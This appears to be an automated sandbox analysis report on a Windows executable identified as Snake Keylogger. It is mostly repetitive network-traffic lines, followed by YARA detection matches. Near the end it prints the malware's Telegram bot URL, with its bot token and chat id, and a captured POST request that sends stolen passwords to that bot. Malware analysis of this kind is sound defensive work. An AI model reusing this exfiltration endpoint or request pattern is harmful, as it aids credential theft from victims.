                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
                Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
                Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: 0OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: 0OZQi3b0tM.exe, 0OZQi3b0tM.exe, 00000000.00000002.737020624.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 0OZQi3b0tM.exeString found in binary or memory: http://checkip.dyndns.org/q
                Source: 0OZQi3b0tM.exe, 00000000.00000002.737020624.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 0OZQi3b0tM.exe, 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: 0OZQi3b0tM.exeString found in binary or memory: https://api.telegram.org/bot
                Source: 0OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856
                Source: 0OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: 0OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8
                Source: unknownHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756c77a0974Host: api.telegram.orgContent-Length: 504Connection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49948 version: TLS 1.2

                System Summary

                barindex
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737477229.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737233949.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737426073.000000000292C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737400500.000000000291C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737877910.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737872155.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738102517.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737894796.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737177065.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737163773.0000000002894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738298999.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737551923.000000000295C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
